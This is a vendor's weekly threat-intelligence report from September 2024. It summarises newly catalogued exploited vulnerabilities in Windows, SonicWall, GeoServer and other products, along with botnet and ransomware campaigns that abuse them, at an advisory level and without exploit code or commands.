/
/
A Week of Wild Exploitations and Threats

A Week of Wild Exploitations and Threats

September 13, 2024
Executive Summary

This week has been very critical, with CISA adding seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Among these are four Microsoft-related issues: CVE-2024-38226, CVE-2024-43491, CVE-2024-38014, and CVE-2024-38217. These vulnerabilities, addressed in Microsoft’s latest Patch Tuesday update, pose significant risks if not swiftly patched, underscoring the urgent need for system updates to thwart potential attacks.

In addition, CISA has included two older yet still critical vulnerabilities: CVE-2017-1000253, a serious Linux Kernel flaw, and CVE-2016-3714, an issue with ImageMagick software. The addition of these historic vulnerabilities highlights their ongoing threat, particularly to critical infrastructure that may remain unpatched. This week’s updates emphasize the need for vigilant security practices and comprehensive updates for both current and legacy vulnerabilities across all systems.

The notorious Akira ransomware has been actively exploiting CVE-2024-40766, a critical vulnerability in SonicWall Firewalls, to gain initial access to victims' systems. Similarly, the APT-41 threat actor has been deploying the SideWalk trojan malware, which targets a critical vulnerability in OSGeo GeoServer GeoTools.

The Mirai botnet continues its aggressive exploitation, targeting LB-Link BL devices, TP-Link Archer AX21 routers, and Avtech Security cameras. Notably, variants of Mirai such as Condi and JenX are leveraging a critical vulnerability in OSGeo GeoServer GeoTools. Additionally, the Sysrv and Enemy botnets are exploiting vulnerabilities in Spring Cloud Gateway and Huawei HG532 devices. The IoT_Reaper botnet remains active, persistently exploiting an eight-year-old vulnerability in MVPower CCTV DVR models.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-38014

A recently disclosed Windows Installer vulnerability, identified as CVE-2024-38014, poses a severe threat by allowing attackers to elevate their privileges to SYSTEM level without requiring user input. With a CVSS score of 7.8 and an EPSS score of 0.00146, this high-severity vulnerability has been added to the CISA KEV catalog.

CVE-2024-38217

A security feature bypass vulnerability in the Windows Mark-of-the-Web (MotW), tracked as CVE-2024-38217, has an EPSS score of 0.00382. This exploit could compromise the Mark of the Web functionality, enabling unauthorized actions on the user's system. Microsoft describes the impact as a "limited compromise," affecting the integrity and availability of application reputation checks and other security features. This vulnerability has been added to the CISA KEV catalog.

CVE-2024-38826

Recently added to CISA KEV catalog, a security feature bypass vulnerability in Microsoft Publisher, rated with a low EPSS score of 0.00144, enables attackers to evade Office macro policies. This vulnerability poses a significant risk by allowing the execution of untrusted or malicious files, which could compromise system security.

CVE-2024-43491

Yet another remote code execution vulnerability in Microsoft Windows, identified as CVE-2024-43491, has an EPSS score of 0.00712 and a high CVSS score of 9.8. This critical flaw allows attackers to exploit previously mitigated vulnerabilities in Windows 10, version 1507. The issue involves a rollback of fixes that Microsoft had implemented between March and August for certain versions of Windows 10. This vulnerability has been added to the CISA KEV catalog, highlighting its significant threat to system security.

CVE-2024-45506

A vulnerability in HAProxy, with an EPSS score of 0.00858 and a CVSS score of 7.8, can create an endless loop under certain conditions, potentially causing a system crash and enabling remote denial-of-service (DoS) attacks. This issue arises from a flaw in the HTTP/2 multiplexer, particularly when used with zero-copy forwarding designed to optimize data transfer. In rare cases, attackers can exploit this vulnerability to initiate an infinite loop in the h2_send() function.

CVE-2024-40766

An improper access control vulnerability in SonicWall SonicOS, impacting both management access and SSLVPN, can grant unauthorized access to system resources and, in some cases, cause a firewall crash. With a CVSS score of 9.3 and an EPSS score of 0.01179, this vulnerability poses a serious security risk and has been added to the CISA KEV catalog.  

CVE-2017-1000253

A high-severity stack-based buffer overflow vulnerability in the Linux Kernel, rated CVSS 7.8 and EPSS 0.06297, allows local attackers to escalate privileges. Recently included in the CISA KEV catalog and with a publicly available proof of concept (PoC), this vulnerability has been historically exploited by DarkRadiation ransomware and the Libprocesshider rootkit, representing a serious security risk.

CVE-2016-3714

Discovered eight years ago, an improper input validation flaw in ImageMagick allows attackers to run arbitrary code by embedding malicious shell metacharacters in images. The vulnerability, rated with a CVSS score of 8.4 and a high EPSS score of 0.97355, poses a significant security threat and has recently been added to the CISA KEV catalog.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Vulnerabilities Product Severity Title Exploited – in the-wild CISA KEV
CVE-2023-38646 Metabase open source and Metabase Enterprise Critical Remote code execution vulnerability in Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 True True
CVE-2023-4415 Ruijie RG-EW1200G 07161417 r483 High Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 False False
CVE-2023-26801 LB-LINK Critical Command injection vulnerability in LB-LINK devices True False
CVE-2023-1389 TP-Link Archer AX-21 High Command Injection Vulnerability in TP-Link Archer AX-21 True True
CVE-2022-34045 Wavlink Devices Critical Hardcoded encryption/decryption key vulnerability in Wavlink False False
CVE-2022-30489 Wavlink Devices Medium Cross-site scripting vulnerability in Wavlink Devices False False
CVE-2022-30023 Tenda Devices High Command injection vulnerability via the Ping function in Tenda Products False False
CVE-2022-25168 Apache Hadoop Critical Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop False False
CVE-2022-24847 GeoServer High Improper input validation vulnerability in GeoServer leads to arbitrary code execution False False
CVE-2022-41040 Microsoft Exchange Server High Server-Side Request Forgery Vulnerability in Microsoft Exchange Server True True
CVE-2022-22947 Spring Cloud Gateway Critical Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ True True

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets,including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloadssuggestive of botnet activities, like utilizing wget with IP addresses.

Vulnerability Product Title Exploit Abused by Botnet
CVE-2023-26801 LB-LINK BL Devices Command injection vulnerability in LB-LINK BL-AC1900_2.0 1.0.1, BL-WR9000 2.4.9, BL-X26 1.2.5 and BL-LTE300 1.0.8 True Mirai
CVE-2022-22947 Spring Cloud Gateway Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ True Enemybot,
GuardMiner,
Sysrv-botnet
CVE-2017-17215 Huawei HG532 Remote code execution vulnerability in Huawei HG532 router True Sysrvbotnet
CVE-2016-20016 MVPower CCTV DVR models Remote code execution vulnerability in MVPower CCTV DVR models True IoT-Reaper

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2024-40766

Recent investigations from Artic Wolf revealed that a critical improper access control vulnerability in SonicWall Firewall is being exploited by Akira ransomware to gain initial access to the target systems. Akira ransomware, first identified in early 2023, operates under a Ransomware-as-a-Service (RaaS) model and is linked to threat actors such as GOLD SAHARA, PUNK SPIDER, and Storm-1567. It employs a double extortion tactic, exfiltrating data before encrypting victim systems, and demands Bitcoin payments for decryption or to prevent data leaks.

CVE-2024-36401

An eval injection vulnerability in GeoServer can lead to remote code execution and has been exploited by GOREVERSE malware. In certain cases, attackers have used this flaw to deploy SideWalk malware, a sophisticated backdoor linked to the APT41 threat group. Additionally, the vulnerability has been leveraged to distribute Mirai variants like JenX and the Condi DDoS bot.

Vulnerability Severity Title Patch Targeted By Malware OSS
CVE-2024-40766 Critical Improper Access Control vulnerability in SonicWall SonicOS management access leads to crash True Akira Ransomware False
CVE-2024-36401 Critical Eval Injection vulnerability in GeoServer leads to remote code execution True Mirai Variant - JenX,
SideWalk,
Condi,
Coinminer,
GOREVERSE,
APT-41
True

PRE-NVD

It refers tovulnerabilities discovered and potentially exploited before their official inclusionin the National Vulnerability Database. The LOVI Platform aggregates anddistributes data from open sources and social media, currently tracking over100 security alerts and planning to expand.

CVE-ID Type of Vulnerability Product Reference
CVE-2024-8356 Privilege Escalation Visteon Infotainment Resource
CVE-2024-5581 Directory Traversal Allegra Resource
CVE-2024-26006 Cross-site Scripting FortiOS and FortiProxy’s web SSL VPN UI Resource
CVE-2024-5580 Deserialization of Untrusted Data Allegra Resource
CVE-2024-8357 Privilege Escalation Visteon Infotainment Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2024/09/09/cisa-adds-three-known-exploited-vulnerabilities-catalog  
  2. https://www.cisa.gov/news-events/alerts/2024/09/10/cisa-adds-four-known-exploited-vulnerabilities-catalog  
  3. https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401  
  4. https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/  
  5. https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep  
  6. https://socradar.io/akira-ransomware-targets-sonicwall-vulnerability-cve-2024-40766-immediate-patching-required/  

Subscribe to our Reports

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Latest Reports

Weekly Reports